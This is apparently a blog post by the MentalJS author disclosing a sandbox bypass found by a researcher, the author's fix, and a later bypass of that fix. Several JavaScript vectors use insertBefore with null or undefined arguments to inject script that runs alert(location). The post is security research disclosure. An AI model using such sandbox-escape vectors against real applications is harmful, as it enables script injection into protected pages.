MentalJS DOM bypass

Ruben Ventura (@tr3w_) found a pretty cool bypass of MentalJS. He used insertBefore with a null second argument which allows you to insert a node into the dom and bypass my sandboxing restrictions. The vector is below:-


_=document

x.insertBefore(s.firstChild, null)
_.body.appendChild(x)


It can actually be compressed to the following:

s=document.createElement('script');
s.insertBefore(document.createTextNode('alert(location)'),null);
document.body.appendChild(s);


The fix was to check if the second argument is null and the parent node is a script. Clean the script and then sandbox the code. Hopefully that will fix the attack, I couldn’t see a way to use insertBefore without a null argument to cause another bypass.

Update…

@tr3w_ broke my fix he used undefined instead of null to bypass my condition and also cleverly used insertBefore with a node that occurs within the script to bypass cleaning the script and inject his code.


with(document) {
s = createElement('script');
s.insertBefore(createTextNode('alert(location)'), [][[]]);
body.appendChild(s);
}



with(document) {
s = createElement('script');
s.insertBefore(createTextNode('/**/'),null);
s.insertBefore(createTextNode('alert(location)'),s.firstChild);
}


Print Share Comment Cite Upload Translate

APA

() » MentalJS DOM bypass. Retrieved from https://www.truth.cx/2015/03/06/mentaljs-dom-bypass/.

MLA

" » MentalJS DOM bypass." - , https://www.truth.cx/2015/03/06/mentaljs-dom-bypass/

HARVARD

» MentalJS DOM bypass., viewed ,

VANCOUVER

- » MentalJS DOM bypass. [Internet]. [Accessed ]. Available from: https://www.truth.cx/2015/03/06/mentaljs-dom-bypass/

CHICAGO

" » MentalJS DOM bypass." - Accessed . https://www.truth.cx/2015/03/06/mentaljs-dom-bypass/

IEEE

" » MentalJS DOM bypass." [Online]. Available: https://www.truth.cx/2015/03/06/mentaljs-dom-bypass/. [Accessed: ]

Select a language: Afrikaans Albanian Arabic Armenian Basque Bengali Bulgarian Catalan Cambodian Chinese (Mandarin) Croatian Czech Danish Dutch English Estonian Fiji Finnish French Georgian German Greek Gujarati Hebrew Hindi Hungarian Icelandic Indonesian Irish Italian Japanese Javanese Korean Latin Latvian Lithuanian Macedonian Malay Malayalam Maltese Maori Marathi Mongolian Nepali Norwegian Persian Polish Portuguese Punjabi Quechua Romanian Russian Samoan Serbian Slovak Slovenian Spanish Swahili Swedish Tamil Tatar Telugu Thai Tibetan Tonga Turkish Ukrainian Urdu Uzbek Vietnamese Welsh Xhosa <p>Ruben Ventura (@tr3w_) found a pretty cool bypass of MentalJS. He used insertBefore with a null second argument which allows you to insert a node into the dom and bypass my sandboxing restrictions. The vector is below:-</p> <p><code><br /> _=document</p> <p>x =_.createElement('script');<br /> s =_.createElement('style')<br /> s.innerHTML = '*/alert(location)//'</p> <p>t=_.createElement('b')<br /> t.textContent = '/*'<br /> x.insertBefore(t.firstChild, null);<br /> x.insertBefore(s, null)<br /> _.body.appendChild(x)</p> <p>x =_.createElement('script');<br /> s =_.createElement('style')<br /> s.innerHTML = _.getElementsByTagName('script')[2].textContent</p> <p>x.insertBefore(s.firstChild, null)<br /> _.body.appendChild(x)<br /> </code></p> <p>It can actually be compressed to the following:<br /> <code><br /> s=document.createElement('script');<br /> s.insertBefore(document.createTextNode('alert(location)'),null);<br /> document.body.appendChild(s);<br /> </code></p> <p><a href="https://github.com/hackvertor/MentalJS/commit/62ed81b73d1a07d7478dcfc29e095693082d17d1#diff-dfb223a83fe3e657b9403f41f0f4c121L5898">The fix</a> was to check if the second argument is null and the parent node is a script. Clean the script and then sandbox the code. Hopefully that will fix the attack, I couldn’t see a way to use insertBefore without a null argument to cause another bypass.</p> <h3>Update…</h3> <p>@tr3w_ broke my fix <img src="https://s.w.org/images/core/emoji/11.2.0/72x72/1f642.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> he used undefined instead of null to bypass my condition and also cleverly used insertBefore with a node that occurs within the script to bypass cleaning the script and inject his code. </p> <p><code><br /> with(document) {<br /> s = createElement('script');<br /> s.insertBefore(createTextNode('alert(location)'), [][[]]);<br /> body.appendChild(s);<br /> }<br /> </code></p> <p><code><br /> with(document) {<br /> s = createElement('script');<br /> s.insertBefore(createTextNode('/**/'),null);<br /> s.insertBefore(createTextNode('alert(location)'),s.firstChild);<br /> }<br /> </code></p> First name:

Last name: